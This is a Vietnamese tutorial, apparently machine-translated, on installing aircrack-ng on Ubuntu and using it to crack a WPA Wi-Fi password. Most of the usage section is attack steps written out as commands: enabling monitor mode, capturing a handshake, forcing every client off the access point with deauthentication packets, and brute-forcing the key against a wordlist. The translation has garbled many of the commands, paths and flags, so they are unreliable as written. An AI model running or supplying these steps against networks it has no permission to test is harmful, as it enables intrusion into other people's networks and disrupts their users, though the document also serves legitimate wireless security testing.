Cài đặt Aircrack trên Ubuntu

Install Aircrack Ng Ubuntu



Aircrack-ng là một bộ công cụ hoàn chỉnh để Kiểm tra Bảo mật Không dây. Nó có thể được sử dụng để theo dõi, kiểm tra, bẻ khóa hoặc tấn công các Giao thức bảo mật không dây như WEP, WPA, WPA2. Aircrack-ng dựa trên dòng lệnh và có sẵn cho Windows và Mac OS và các hệ điều hành Unix khác. Bộ Aircrack-ng chứa rất nhiều công cụ được sử dụng cho các mục đích khác nhau nhưng ở đây chúng ta sẽ chỉ xem xét một số công cụ quan trọng được sử dụng thường xuyên hơn trong thử nghiệm Bảo mật không dây.

Airmon-ng







Airmon-ng được sử dụng để quản lý các chế độ thẻ không dây và để loại bỏ các quy trình không cần thiết trong khi sử dụng aircrack-ng. Để kiểm tra kết nối không dây, bạn cần thay đổi thẻ không dây của mình từ chế độ được quản lý sang chế độ giám sát và airmon-ng được sử dụng cho mục đích đó.



Airodump-ng



Airodump-ng là một thiết bị dò tìm không dây có thể thu thập dữ liệu không dây từ một hoặc nhiều Điểm truy cập không dây. Nó được sử dụng để phân tích các Điểm truy cập gần đó và để nắm bắt những cái bắt tay.





Aireplay-ng

Aireplay-ng được sử dụng cho các cuộc tấn công phát lại và như một bộ tiêm gói. Nó có thể được khử xác thực người dùng từ các AP của họ để bắt tay.



Airdecap-ng

Airdecap-ng được sử dụng để giải mã các gói không dây WEP, WPA / WPA2 được mã hóa với khóa đã biết.

Aircrack-ng

Aircrack-ng được sử dụng để tấn công các giao thức không dây WPA / WEP nhằm tìm ra khóa.

Aircrack-ng rất dễ cài đặt trong Ubuntu bằng APT. Chỉ cần gõ lệnh sau và thao tác này sẽ cài đặt tất cả các công cụ có sẵn trong bộ Aircrack-ng.

sudo apt-get cập nhật
sudo apt-get cài đặt -vàaircrack-ng

Sử dụng

Trong bài viết này, chúng ta sẽ xem xét nhanh cách sử dụng aircrack-ng để bẻ khóa mạng không dây được mã hóa (trong ví dụ này là TR1CKST3R) để tìm mật khẩu.

Trước hết, hãy liệt kê tất cả các thẻ không dây hiện có được kết nối với PC của bạn bằng lệnh ‘iwconfig’.

Chúng tôi sẽ sử dụng thẻ không dây có tên ‘wlxc83a35cb4546’ cho hướng dẫn này (Điều này có thể khác trong trường hợp của bạn). Bây giờ, hãy giết tất cả các tiến trình đang chạy trên thẻ không dây bằng airmon-ng.

[email được bảo vệ]: ~ $sudokiểm tra airmon-nggiết chết
Bắt đầu chế độ Màn hình trên ‘wlxc83a35cb4546’ bằng cách nhập
[email được bảo vệ]: ~ $sudoairmon-ng start wlxc83a35cb4546

Bây giờ, airmon-ng đã bắt đầu chế độ Màn hình trên thẻ không dây, nó sẽ xuất hiện với tên khác là ‘wlan0mon’. Chạy lại ‘iwconfig’ để liệt kê các chi tiết không dây.

Sau đó, sử dụng airodump-ng để xem các Điểm truy cập không dây gần đó và thuộc tính của chúng.

[email được bảo vệ]: ~ $sudoairodump-ng wlan0mon

Bạn có thể thu hẹp tìm kiếm bằng cách sử dụng bộ lọc MAC (–bssid) và kênh (-c). Để nắm bắt bắt tay (Handshake chứa mật khẩu được mã hóa), chúng ta cần lưu các gói tin của mình ở đâu đó bằng cách sử dụng tùy chọn –write. Kiểu,

[email được bảo vệ]: ~ $sudoairodump-ng--bss6C: B7:49: FC:62: E 4
-NS mười mộtwlan0mon--viết /tmp/bắt tay.cap

--bss: Địa chỉ MAC của Điểm truy cập

-NS: Kênh của Access Point[1-13]

--viết: Lưu trữ các gói đã bắt tại một vị trí xác định

Bây giờ, chúng ta cần khử xác thực mọi thiết bị từ Access Point này bằng tiện ích Aireplay-ng. Viết

[email được bảo vệ]: ~ $sudoaireplay-ng-0 100 -đến [MAC_ADD]wlan0mon

-a: Chỉ định MAC của Access Point cho Aireplay-ng

-0: Chỉ định số lượng gói deauth cần gửi

Sau một thời gian, tất cả các thiết bị sẽ bị ngắt kết nối khỏi Điểm truy cập đó, khi chúng cố gắng kết nối lại, chạy airodump-ng sẽ bắt tay. Nó sẽ xuất hiện ở đầu airodump-ng đang chạy.

Handshake được lưu trữ trong thư mục ‘/ tmp /’ và chứa mật khẩu được mã hóa có thể bị cưỡng bức ngoại tuyến bằng cách sử dụng từ điển. Để bẻ khóa mật khẩu, chúng tôi sẽ sử dụng Aircrack-ng. Kiểu

[email được bảo vệ]: ~ $sudoaircrack-ng/tmp/bắt tay.cap-01.cap-trong
/usr/đăng lại/Danh sách các từ/Rockou.txt
-trong: Chỉ định vị trí từ điển

Aircrack-ng sẽ xem qua danh sách mật khẩu và nếu được tìm thấy, nó sẽ hiển thị mật khẩu được sử dụng làm khóa.

Trong trường hợp này, aircrack-ng tìm thấy mật khẩu được sử dụng là ‘123456789’.

Bây giờ, dừng chế độ Màn hình trên thẻ không dây và khởi động lại trình quản lý mạng.

[email được bảo vệ]: ~ $sudoairmon-ng stop wlan0mon
[email được bảo vệ]: ~ $sudokhởi động lại trình quản lý mạng dịch vụ

Phần kết luận

Aircrack-ng có thể được sử dụng để kiểm tra Bảo mật không dây hoặc để bẻ khóa mật khẩu bị quên. Có một số công cụ tương tự khác có sẵn cho mục đích này như Kismet nhưng aircrack-ng được biết đến nhiều hơn vì hỗ trợ tốt, tính linh hoạt và có nhiều loại công cụ. Nó có giao diện dòng lệnh dễ sử dụng, có thể dễ dàng được tự động hóa bằng bất kỳ ngôn ngữ kịch bản nào như Python.